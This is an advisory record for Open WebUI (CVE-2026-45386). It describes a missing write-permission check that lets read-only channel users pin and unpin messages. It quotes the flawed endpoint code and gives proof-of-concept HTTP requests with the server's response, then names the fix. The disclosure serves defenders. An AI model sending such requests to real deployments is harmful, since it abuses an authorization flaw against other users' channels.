{"id":"PYSEC-2026-2705","summary":"Open WebUI has an IDOR vulnerability in the pin_channel_message API endpoint","details":"### Summary\n`Pin/Unpin` is a write operation (modifies the message's `is_pinned `, `pinned_by`, `pinned_at` fields), but in standard channels it only checks `read` permission, allowing users with read-only access to pin/unpin any message.\n\n### Details\nhttps://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/backend/open_webui/routers/channels.py#L1218\n\n```\n@router.post('/{id}/messages/{message_id}/pin', response_model=Optional[MessageUserResponse])\nasync def pin_channel_message(\n    request: Request,\n    id: str,\n    message_id: str,\n    form_data: PinMessageForm,\n    user=Depends(get_verified_user),\n    db: Session = Depends(get_session),\n):\n    check_channels_access(request)\n    channel = Channels.get_channel_by_id(id, db=db)\n    if not channel:\n        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=ERROR_MESSAGES.NOT_FOUND)\n\n    if channel.type in ['group', 'dm']:\n        if not Channels.is_user_channel_member(channel.id, user.id, db=db):\n            raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())\n    else:\n        if user.role != 'admin' and not channel_has_access(user.id, channel, permission='read', db=db):\n            raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())\n```\n\nThe `channel_has_access` function https://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/backend/open_webui/routers/channels.py#L75 checks user permissions against the `AccessGrants` table:\n\n```\ndef channel_has_access(\n    user_id: str,\n    channel: ChannelModel,\n    permission: str = 'read',  # 'read' or 'write'\n    strict: bool = True,\n    db: Optional[Session] = None,\n) -\u003e bool:\n    if AccessGrants.has_access(\n        user_id=user_id,\n        resource_type='channel',\n        resource_id=channel.id,\n        permission=permission,\n        db=db,\n    ):\n        return True\n    # ...\n```\n\nThe `AccessGrant` table distinguishes between `read` and `write` permission levels.\n\n### PoC\n`admin` creates Standard Channel with Read-Only Access for `test1` :\n\n```\nPOST /api/v1/channels/create\nAuthorization: \nContent-Type: application/json\n\n{\n  \"name\": \"pin-test-standard\",\n  \"access_grants\": [\n    {\n      \"principal_type\": \"user\",\n      \"principal_id\": \"cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c\",\n      \"permission\": \"read\"\n    }\n  ]\n}\n```\n\n`admin` posts a Message in the Channel,  and  `test1` has `read` permission only.\n\u003cimg width=\"1024\" height=\"423\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e9912bd7-3908-44f2-8984-22d0535dc66f\" /\u003e\n\n`test1` attempts to Pin Message:\n\n```\nPOST /api/v1/channels/0699b656-578f-4976-94b0-65e2b19752fd/messages/4797359b-aad5-4081-9617-e8ca58524a87/pin\nAuthorization: Bearer \u003ctest1_token\u003e\nContent-Type: application/json\n\n{\n  \"is_pinned\": true\n}\n```\n\n```\n{\n  \"id\": \"4797359b-aad5-4081-9617-e8ca58524a87\",\n  \"user_id\": \"28c859b7-84e2-4217-b4d7-3f0e43f7c4b9\",\n  \"is_pinned\": true,\n  \"pinned_by\": \"cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c\",\n  \"pinned_at\": 1774716314908288719,\n  \"content\": \"Admin announcement in standard channel - test1 should NOT be able to pin this\"\n}\n```\n\nSuccessfully pinned admin's message. `pinned_by` records test1's user ID.\n\u003cimg width=\"1024\" height=\"350\" alt=\"image\" src=\"https://github.com/user-attachments/assets/705b1f45-95a9-4e91-8a74-10bdbccde0b8\" /\u003e\n\n `test1` (Read-Only) can alse Unpin Message. The Pin/Unpin endpoint in standard channels only checks `read` permission, allowing read-only users to pin/unpin any message.\n\n### Impact\nRead-only users can pin irrelevant messages, disrupting important information display in the channel .\n\n### Recommended Fix\nChange the Pin endpoint's permission check from `read` to `write` .","aliases":["CVE-2026-45386","GHSA-5gc6-xhv4-2wg6"],"modified":"2026-07-13T16:32:23.903398910Z","published":"2026-07-13T15:19:07.247728Z","references":[{"type":"WEB","url":"https://github.com/open-webui/open-webui/security/advisories/GHSA-5gc6-xhv4-2wg6"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45386"},{"type":"PACKAGE","url":"https://github.com/open-webui/open-webui"},{"type":"WEB","url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.5"},{"type":"PACKAGE","url":"https://pypi.org/project/open-webui"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-5gc6-xhv4-2wg6"}],"affected":[{"package":{"name":"open-webui","ecosystem":"PyPI","purl":"pkg:pypi/open-webui"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"0.9.5"}]}],"versions":["0.1.124","0.1.125","0.2.0","0.2.1","0.2.2","0.2.3","0.2.4","0.2.5","0.3.0","0.3.1","0.3.10","0.3.12","0.3.13","0.3.14","0.3.15","0.3.16","0.3.17","0.3.17.dev2","0.3.17.dev3","0.3.17.dev4","0.3.17.dev5","0.3.18","0.3.19","0.3.2","0.3.20","0.3.21","0.3.22","0.3.23","0.3.24","0.3.25","0.3.26","0.3.27","0.3.27.dev1","0.3.27.dev2","0.3.27.dev3","0.3.28","0.3.29","0.3.3","0.3.30","0.3.30.dev1","0.3.30.dev2","0.3.31","0.3.31.dev1","0.3.32","0.3.33","0.3.33.dev1","0.3.34","0.3.35","0.3.4","0.3.5","0.3.6","0.3.7","0.3.8","0.3.9","0.4.0","0.4.0.dev1","0.4.0.dev2","0.4.1","0.4.2","0.4.3","0.4.4","0.4.5","0.4.6","0.4.6.dev1","0.4.7","0.4.8","0.5.0","0.5.0.dev1","0.5.0.dev2","0.5.1","0.5.10","0.5.11","0.5.12","0.5.13","0.5.14","0.5.15","0.5.16","0.5.17","0.5.18","0.5.19","0.5.2","0.5.20","0.5.3","0.5.3.dev1","0.5.4","0.5.5","0.5.6","0.5.7","0.5.8","0.5.9","0.6.0","0.6.1","0.6.10","0.6.11","0.6.12","0.6.13","0.6.14","0.6.15","0.6.16","0.6.18","0.6.19","0.6.2","0.6.20","0.6.21","0.6.22","0.6.23","0.6.24","0.6.25","0.6.26","0.6.26.dev1","0.6.27","0.6.28","0.6.29","0.6.3","0.6.30","0.6.31","0.6.32","0.6.33","0.6.34","0.6.35","0.6.36","0.6.37","0.6.38","0.6.39","0.6.4","0.6.40","0.6.41","0.6.42","0.6.43","0.6.5","0.6.6","0.6.6.dev1","0.6.7","0.6.8","0.6.9","0.7.0","0.7.1","0.7.2","0.8.0","0.8.1","0.8.10","0.8.11","0.8.12","0.8.2","0.8.3","0.8.4","0.8.5","0.8.6","0.8.7","0.8.8","0.8.9","0.9.0","0.9.1","0.9.2","0.9.3","0.9.4"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/open-webui/PYSEC-2026-2705.yaml"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"}]}